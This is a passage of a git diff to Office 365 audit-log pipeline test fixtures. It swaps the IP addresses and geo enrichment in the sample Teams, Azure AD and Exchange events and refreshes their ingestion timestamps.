"2021-06-17T07:32:54.058009500Z", + "ingested": "2021-12-09T13:42:43.978959100Z", "original": "{\"ClientIP\":\"10.11.12.13:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -114,7 +114,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-06-17T07:32:54.058011400Z", + "ingested": "2021-12-09T13:42:43.978963500Z", "original": "{\"ClientIP\":\"10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -157,7 +157,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-06-17T07:32:54.058013100Z", + "ingested": "2021-12-09T13:42:43.978967600Z", "original": "{\"ClientIP\":\"::ffff:10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -202,7 +202,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-06-17T07:32:54.058014900Z", + "ingested": "2021-12-09T13:42:43.978971100Z", "original": "{\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -234,21 +234,36 @@ }, "related": { "ip": [ - "2001:db8::abcd" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "client": { "port": 12345, - "address": "2001:db8::abcd", - "ip": "2001:db8::abcd" + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, "port": 12345, - "ip": "2001:db8::abcd" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-06-17T07:32:54.058016700Z", - "original": "{\"ClientIP\":\"[2001:db8::abcd]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", + "ingested": "2021-12-09T13:42:43.978975700Z", + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "type": [ @@ -279,19 +294,34 @@ }, "related": { "ip": [ - "2001:db8::abcd" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "client": { - "address": "2001:db8::abcd", - "ip": "2001:db8::abcd" + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "ip": "2001:db8::abcd" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-06-17T07:32:54.058018400Z", - "original": "{\"ClientIP\":\"2001:db8::abcd\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", + "ingested": "2021-12-09T13:42:43.978981800Z", + "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "type": [ @@ -321,11 +351,11 @@ "version": "1.12.0" }, "client": { - "domain": "[2001:db8::abcd]" + "domain": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]" }, "event": { - "ingested": "2021-06-17T07:32:54.058020100Z", - "original": "{\"ClientIP\":\"[2001:db8::abcd]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", + "ingested": "2021-12-09T13:42:43.978987800Z", + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "type": [ @@ -355,7 +385,7 @@ "domain": "[10.11.12.13]" }, "event": { - "ingested": "2021-06-17T07:32:54.058021700Z", + "ingested": "2021-12-09T13:42:43.978993800Z", "original": "{\"ClientIP\":\"[10.11.12.13]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -386,7 +416,7 @@ "domain": "localhost" }, "event": { - "ingested": "2021-06-17T07:32:54.058023300Z", + "ingested": "2021-12-09T13:42:43.978999700Z", "original": "{\"ClientIP\":\"localhost\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -417,7 +447,7 @@ "domain": "[localhost]:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058025100Z", + "ingested": "2021-12-09T13:42:43.979005600Z", "original": "{\"ClientIP\":\"[localhost]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -448,7 +478,7 @@ "domain": "localhost:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058026900Z", + "ingested": "2021-12-09T13:42:43.979012Z", "original": "{\"ClientIP\":\"localhost:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -479,7 +509,7 @@ "domain": "[cool.client.local]:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058028700Z", + "ingested": "2021-12-09T13:42:43.979018Z", "original": "{\"ClientIP\":\"[cool.client.local]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -510,7 +540,7 @@ "domain": "cool.client.local" }, "event": { - "ingested": "2021-06-17T07:32:54.058030500Z", + "ingested": "2021-12-09T13:42:43.979024Z", "original": "{\"ClientIP\":\"cool.client.local\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -541,7 +571,7 @@ "domain": "cool.client.local:12345" }, "event": { - "ingested": "2021-06-17T07:32:54.058035500Z", + "ingested": "2021-12-09T13:42:43.979030Z", "original": "{\"ClientIP\":\"cool.client.local:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json index e5591652fcb..445df521aee 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261542200Z", + "ingested": "2021-12-09T13:42:44.905415600Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"Operation\":\"TeamCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"Application\",\"UserKey\":\"\",\"UserType\":5,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -113,7 +113,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261548500Z", + "ingested": "2021-12-09T13:42:44.905426400Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:47\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"David\",\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Chuck\",\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Bob\",\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Alice\",\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -183,7 +183,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261550500Z", + "ingested": "2021-12-09T13:42:44.905434200Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"Alan Smithee\",\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -241,7 +241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.261552400Z", + "ingested": "2021-12-09T13:42:44.905438900Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:34\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"ObjectId\":\"Unknown (Unknown)\",\"Operation\":\"TeamsSessionStarted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json index 58c0f2a1127..a202e49e289 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json @@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"79.159.11.115\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"79.159.11.115\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}" + "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}" }, "o365audit": { "CreationTime": "2021-02-05T09:06:07", @@ -15,7 +15,7 @@ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", - "ClientIP": "79.159.11.115", + "ClientIP": "67.43.156.13", "ObjectId": "Unknown", "UserId": "root@testsiem4.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, @@ -32,7 +32,7 @@ } ], "ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "ActorIpAddress": "79.159.11.115", + "ActorIpAddress": "67.43.156.13", "InterSystemsId": "df4c6d6c-4551-4f2d-8766-03700dfccb47", "IntraSystemId": "550ed0e2-27da-4cbc-9fb8-46add4018800", "SupportTicketId": "", @@ -49,10 +49,10 @@ }, { "event": { - "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (15.20.242.17)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}" + "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}" }, "o365audit": { - "OriginatingServer": "HE1PR0102MB3228 (15.20.253.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "ObjectId": "EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 2af884ee63d..5c2138c99c5 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.11.115" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -34,7 +16,7 @@ "ObjectId": "Unknown", "ResultStatus": "Success", "UserKey": "21119711-1517-43d4-8138-b537dafad016", - "ActorIpAddress": "79.159.11.115", + "ActorIpAddress": "67.43.156.13", "ErrorNumber": "0", "ExtendedProperties": { "_raw": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"" @@ -78,7 +60,7 @@ "root" ], "ip": [ - "79.159.11.115" + "67.43.156.13" ] }, "organization": { @@ -89,12 +71,12 @@ "id": "48622b8f-44d3-420c-b4a2-510c8165767e" }, "client": { - "address": "79.159.11.115", - "ip": "79.159.11.115" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:54.349451200Z", - "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"79.159.11.115\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"79.159.11.115\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", + "ingested": "2021-12-09T13:42:45.343188600Z", + "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -120,12 +102,12 @@ }, { "server": { - "address": "15.20.253.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.253.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.253.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -154,7 +136,7 @@ }, "related": { "ip": [ - "15.20.253.17" + "67.43.156.13" ] }, "organization": { @@ -166,8 +148,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:54.349456700Z", - "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (15.20.242.17)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", + "ingested": "2021-12-09T13:42:45.343199Z", + "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json index ceb345d274e..61c420accc6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json +++ 